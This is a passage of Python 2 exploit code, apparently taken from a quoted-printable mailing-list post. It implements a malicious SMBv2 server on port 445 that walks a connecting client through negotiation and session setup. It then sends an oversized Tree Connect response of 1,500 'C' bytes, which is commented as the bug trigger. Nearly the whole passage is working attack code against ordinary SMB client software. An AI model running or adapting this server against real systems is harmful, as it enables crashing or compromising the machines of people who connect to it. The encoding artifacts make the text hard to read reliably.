=09=09("MechlistMICVersion",        ""),# No verification on the client=
 side...
=09=09("MechlistCheckSum",          ""),
=09=09("MechlistSeqNumber",         ""),
                ("Data",                      ""),
    ])
=09def calculate(self):

=09=09###### SecBlobLen Calc:
=09=09CalculateSecBlob =3D str(self.fields["SecBlobTag0"])+str(self.fie=
lds["SecBlobTag0Len"])+str(self.fields["NegTokenResp"])+str(self.fields=
["NegTokenRespLen"])+str(self.fields["NegTokenRespTag0"])+str(self.fiel=
ds["NegTokenRespTag0Len"])+str(self.fields["NegStateResp"])+str(self.fi=
elds["NegTokenRespLen1"])+str(self.fields["NegTokenRespStr"])+str(self.=
fields["SecBlobTag3"])+str(self.fields["SecBlobTag3Len"])+str(self.fiel=
ds["SecBlobOctetHeader"])+str(self.fields["SecBlobOctetLen"])+str(self.=
fields["MechlistMICVersion"])+str(self.fields["MechlistCheckSum"])+str(=
self.fields["MechlistSeqNumber"])

=09=09CalculateASN =3D str(self.fields["NegTokenResp"])+str(self.fields=
["NegTokenRespLen"])+str(self.fields["NegTokenRespTag0"])+str(self.fiel=
ds["NegTokenRespTag0Len"])+str(self.fields["NegStateResp"])+str(self.fi=
elds["NegTokenRespLen1"])+str(self.fields["NegTokenRespStr"])+str(self.=
fields["SecBlobTag3"])+str(self.fields["SecBlobTag3Len"])+str(self.fiel=
ds["SecBlobOctetHeader"])+str(self.fields["SecBlobOctetLen"])+str(self.=
fields["MechlistMICVersion"])+str(self.fields["MechlistCheckSum"])+str(=
self.fields["MechlistSeqNumber"])

                MechLen =3D str(self.fields["SecBlobOctetHeader"])+str(=
self.fields["SecBlobOctetLen"])+str(self.fields["MechlistMICVersion"])+=
str(self.fields["MechlistCheckSum"])+str(self.fields["MechlistSeqNumber=
"])

                #Packet Struct len
=09=09self.fields["SecBlobLen"] =3D struct.pack("<h",len(CalculateSecBl=
ob))
=09=09self.fields["SecBlobTag0Len"] =3D struct.pack("<B",len(CalculateA=
SN))
=09=09self.fields["NegTokenRespLen"] =3D struct.pack("<B", len(Calculat=
eASN)-2)
                self.fields["SecBlobTag3Len"] =3D struct.pack("<B",len(=
MechLen))
                self.fields["SecBlobOctetLen"] =3D struct.pack("<B",len=
(MechLen)-2)

class SMB2TreeData(Packet):
    fields =3D OrderedDict([
=09=09("Len",                   "\x10\x00"),
=09=09("ShareType",             "\x02\x00"),
=09=09("ShareFlags",            "\x30\x00\x00\x00"),
=09=09("ShareCapabilities",     "\x00\x00\x00\x00"),
=09=09("AccessMask",            "\xff\x01\x1f\x01"),  =20
=09=09("Data",                  ""),        =20
    ])

#######################################################################=
###
class SMB2(SocketServer.BaseRequestHandler):
    =20
    def handle(self):
        try:
              self.request.settimeout(1)
              print "From:", self.client_address
              data =3D self.request.recv(1024)

             ##Negotiate proto answer.
              if data[8:10] =3D=3D "\x72\x00" and data[4:5] =3D=3D "\xf=
f":
                head =3D SMBv2Header(CreditCharge=3D"\x00\x00",Credits=
=3D"\x01\x00",PID=3D"\x00\x00\x00\x00")
                t =3D SMB2NegoAns()
                t.calculate()
                packet1 =3D str(head)+str(t)
                buffer1 =3D longueur(packet1)+packet1 =20
                print "[*]Negotiating SMBv2."
                self.request.send(buffer1)
                data =3D self.request.recv(1024)

              if data[16:18] =3D=3D "\x00\x00":
                CreditsRequested =3D data[18:20]
                if CreditsRequested =3D=3D "\x00\x00":
                   CreditsRequested =3D  "\x01\x00"
                CreditCharged =3D data[10:12]
                head =3D SMBv2Header(MessageId=3DGrabMessageID(data), P=
ID=3D"\xff\xfe\x00\x00", CreditCharge=3DGrabCreditCharged(data), Credit=
s=3DGrabCreditRequested(data))
                t =3D SMB2NegoAns(Dialect=3D"\x02\x02")
                t.calculate()
                packet1 =3D str(head)+str(t)
                buffer1 =3D longueur(packet1)+packet1 =20
                print "[*]Negotiate Protocol SMBv2 packet sent."
                self.request.send(buffer1)
                data =3D self.request.recv(1024)

              #Session More Work to Do
              if data[16:18] =3D=3D "\x01\x00":
                head =3D SMBv2Header(Cmd=3D"\x01\x00", MessageId=3DGrab=
MessageID(data), PID=3D"\xff\xfe\x00\x00", CreditCharge=3DGrabCreditCha=
rged(data), Credits=3DGrabCreditRequested(data), SessionID=3D"\x4d\x00\=
x00\x00\x00\x04\x00\x00",NTStatus=3D"\x16\x00\x00\xc0")
                t =3D SMB2Session1Data()
                t.calculate()
                packet1 =3D str(head)+str(t)
                buffer1 =3D longueur(packet1)+packet1
                print "[*]Session challenge SMBv2 packet sent."
                self.request.send(buffer1)
                data =3D self.request.recv(1024)

              #Session Positive
              if data[16:18] =3D=3D "\x01\x00" and GrabMessageID(data)[=
0:1] =3D=3D "\x02":
                head =3D SMBv2Header(Cmd=3D"\x01\x00", MessageId=3DGrab=
MessageID(data), PID=3D"\xff\xfe\x00\x00", CreditCharge=3DGrabCreditCha=
rged(data), Credits=3DGrabCreditRequested(data), NTStatus=3D"\x00\x00\x=
00\x00", SessionID=3DGrabSessionID(data))
                t =3D SMB2SessionAcceptData()
                t.calculate()
                packet1 =3D str(head)+str(t)
                buffer1 =3D longueur(packet1)+packet1
                self.request.send(buffer1)
                data =3D self.request.recv(1024)

              ## Tree Connect
              if data[16:18] =3D=3D "\x03\x00":
                head =3D SMBv2Header(Cmd=3D"\x03\x00", MessageId=3DGrab=
MessageID(data), PID=3D"\xff\xfe\x00\x00", TID=3D"\x01\x00\x00\x00", Cr=
editCharge=3DGrabCreditCharged(data), Credits=3DGrabCreditRequested(dat=
a), NTStatus=3D"\x00\x00\x00\x00", SessionID=3DGrabSessionID(data))
                t =3D SMB2TreeData(Data=3D"C"*1500)#//BUG
                packet1 =3D str(head)+str(t)
                buffer1 =3D longueur(packet1)+packet1
                print "[*]Triggering Bug; Tree Connect SMBv2 packet sen=
t."
                self.request.send(buffer1)
                data =3D self.request.recv(1024)

        except Exception:
           print "Disconnected from", self.client_address
           pass

SocketServer.TCPServer.allow_reuse_address =3D 1
launch =3D SocketServer.TCPServer(('', 445),SMB2)
launch.serve_forever()